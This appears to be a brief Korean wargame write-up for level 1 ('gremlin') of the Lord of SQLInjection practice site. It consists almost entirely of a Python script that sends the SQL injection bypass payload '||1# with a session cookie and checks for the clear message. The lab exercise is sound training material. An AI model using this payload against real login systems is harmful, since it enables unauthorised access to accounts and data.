LOS :: 1번 GREMLIN
WRITEUP 1234567891011import requests url = "http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php"session = {'PHPSESSID':'MY_SESSION'}data = {'id':"'||1#"} res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] GREMLIN Clear!") Colored by Color Scriptercs